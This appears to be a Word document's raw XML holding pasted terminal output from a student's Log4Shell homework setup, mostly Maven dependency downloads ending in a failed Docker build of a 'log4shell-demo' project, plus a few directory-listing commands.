    <w:p w14:paraId="216663B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom (748 B at 31 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D55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22.18 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C61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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom (3.8 kB at 179 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D93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22.20 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0B37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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom (22 kB at 718 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22123A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22.24 Downloading from central: https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DFCC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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.pom (15 kB at 558 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068795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22.28 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DA1A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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.pom (3.7 kB at 166 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADFA1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22.30 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70565F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https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.pom (11 kB at 521 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA202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22.33 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/28.2-android/guava-parent-28.2-android.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33F88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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/28.2-android/guava-parent-28.2-android.pom (13 kB at 561 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2C2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22.36 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E48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https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.pom (2.4 kB at 105 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478927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22.39 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/26.0-android/guava-parent-26.0-android.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6322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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/26.0-android/guava-parent-26.0-android.pom (10 kB at 407 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEF9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22.43 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EF7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https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.pom (2.3 kB at 114 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C3F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22.45 Downloading from central: https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343A6A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https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.pom (2.7 kB at 131 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C4C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22.48 Downloading from central: https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FD9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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.pom (2.1 kB at 92 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477690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22.51 Downloading from central: https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_parent/2.3.4/error_prone_parent-2.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93C5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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_parent/2.3.4/error_prone_parent-2.3.4.pom (5.4 kB at 258 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9FDD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22.53 Downloading from central: https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C4E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https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.pom (2.8 kB at 120 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179AB8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22.56 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25980E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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.pom (28 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55761B7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22.62 Downloading from central: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-buildpack-platform/2.5.5/spring-boot-buildpack-platform-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0984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22.63 Downloading from central: https://repo.maven.apache.org/maven2/net/java/dev/jna/jna-platform/5.7.0/jna-platform-5.7.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D04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22.63 Downloading from central: https://repo.maven.apache.org/maven2/net/java/dev/jna/jna/5.7.0/jna-5.7.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE3DB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22.63 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.20/commons-compress-1.20.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666C9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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043B3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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-buildpack-platform/2.5.5/spring-boot-buildpack-platform-2.5.5.jar (238 kB at 2.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056B7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22.73 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C915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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.jar (329 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257A92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22.89 Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.20/commons-compress-1.20.jar (632 kB at 2.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08003EE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https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79B6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https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458484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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar (780 kB at 2.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D93C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22.94 Downloading from central: https://repo.maven.apache.org/maven2/org/tomlj/tomlj/1.0.0/tomlj-1.0.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA7F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https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar (62 kB at 207 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824A0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22.94 Downloading from central: https://repo.maven.apache.org/maven2/org/antlr/antlr4-runtime/4.7.2/antlr4-runtime-4.7.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00398A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https://repo.maven.apache.org/maven2/org/tomlj/tomlj/1.0.0/tomlj-1.0.0.jar (157 kB at 432 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A89DD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https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.jar (335 kB at 915 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5CD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23.01 Downloading from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DA8A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23.01 Downloading from central: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-loader-tools/2.5.5/spring-boot-loader-tools-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7EE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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar (20 kB at 50 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D97F2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23.05 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.2.0/maven-common-artifact-filters-3.2.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194187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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna-platform/5.7.0/jna-platform-5.7.0.jar (1.3 MB at 2.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFB07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23.08 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.1/maven-artifact-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352BB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https://repo.maven.apache.org/maven2/org/antlr/antlr4-runtime/4.7.2/antlr4-runtime-4.7.2.jar (338 kB at 773 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F87B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23.08 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B639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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.2.0/maven-common-artifact-filters-3.2.0.jar (61 kB at 138 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE11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23.09 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.1/maven-core-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438751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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-loader-tools/2.5.5/spring-boot-loader-tools-2.5.5.jar (250 kB at 506 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394EEA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23.14 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238812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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.1/maven-artifact-3.1.1.jar (52 kB at 105 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627D62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23.15 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31507B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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna/5.7.0/jna-5.7.0.jar (1.7 MB at 3.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779BE0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23.15 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320D3C3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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.jar (154 kB at 299 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC1F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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DFDA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.jar (42 kB at 79 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBB7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23.18 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384202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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.jar (25 kB at 47 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED354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23.18 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6689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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.jar (42 kB at 77 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2B2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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5631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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.jar (60 kB at 105 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C105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23.22 Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.1/maven-core-3.1.1.jar (557 kB at 978 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FBCC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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.jar (62 kB at 108 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC7FC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23.22 Downloading from central: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEEF5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23.22 Downloading from central: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B9B9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.6.3/maven-plugin-api-3.6.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC953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23.22 Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar (4.2 kB at 7.3 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23865D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23.22 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBC82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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.jar (160 kB at 268 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAEE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23.24 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1EB0B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.6.3/maven-plugin-api-3.6.3.jar (47 kB at 76 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306E74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23.27 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186FEE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.jar (53 kB at 83 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DD0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23.28 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E172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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.jar (197 kB at 287 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0163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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E9A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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.jar (134 kB at 192 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5BB5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23.35 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C618F8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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.jar (120 kB at 171 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC78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23.35 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704317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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.jar (291 kB at 413 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F7F0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23.35 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD4149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23.35 Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.jar (262 kB at 370 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75267D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23.35 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A115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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.jar (26 kB at 36 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB896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23.37 Downloading from central: https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6563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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.jar (33 kB at 45 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB794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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.jar (53 kB at 71 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D35E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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE3D8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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E851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23.39 Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.jar (72 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79FD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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC837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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.jar (122 kB at 158 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CD7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23.42 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5BB7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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.jar (37 kB at 47 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E7B1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23.43 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E5D2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https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar (4.6 kB at 5.7 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D92A8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23.46 Downloading from central: https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06408C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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.jar (85 kB at 104 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75552B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23.47 Downloading from central: https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C8F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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.jar (180 kB at 217 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7AA1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23.48 Downloaded from central: https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar (2.2 kB at 2.6 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A4EC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23.48 Downloading from central: https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013BF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23.48 Downloading from central: https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5E3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https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.jar (5.9 kB at 7.0 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDAE7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23.49 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1547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https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.jar (305 kB at 360 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194358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https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.jar (8.8 kB at 10 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF306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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.jar (14 kB at 16 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DFF98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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.jar (500 kB at 555 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797415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https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.jar (2.6 MB at 2.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D3D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24.19 [INFO] ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCB3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24.19 [INFO] BUILD FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD2022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24.19 [INFO] ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A8D5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24.19 [INFO] Total time:  21.587 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609DE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24.20 [INFO] Finished at: 2025-05-28T23:05:29Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B078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24.20 [INFO] ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403F9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24.20 [ERROR] Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0789F01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24.20 [ERROR]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD6A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24.20 [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507A40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24.20 [ERROR] Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C56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24.20 [ERROR]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5CFD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24.21 [ERROR] For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53711A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24.21 [ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522C1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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170B4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Dockerfile:5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1D2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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C794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3 |     WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AAA0E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4 |     COPY . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB50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5 | &gt;&gt;&gt; RUN mvn clean package -DskipTests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A797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6 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163A1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7 |     # Run stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C62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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E672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failed to solve: process "/bin/sh -c mvn clean package -DskipTests" did not complete successfully: exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E86D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docker images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB3BD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REPOSITORY        TAG       IMAGE ID       CREATED       SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC41D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ubuntu            latest    a0e45e2ce6e6   4 weeks ago   78.1MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB67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osixia/openldap   latest    31d1d6e16394   4 years ago   257MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB8A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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF27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/home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED5D9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ls -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0421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Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127363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SRC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0B5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docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6931B3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ldap_test.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF31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pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755115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./mvnw clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B634F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-bash: ./mvnw: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A01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docker build -t log4shell-demo .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C21A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Building 9.0s (6/6) FINISHED                                                                                docker:default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A6A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=&gt; [internal] load build definition from Dockerfile                                                                      0.0s</w:t>
      </w:r>
    </w:p>
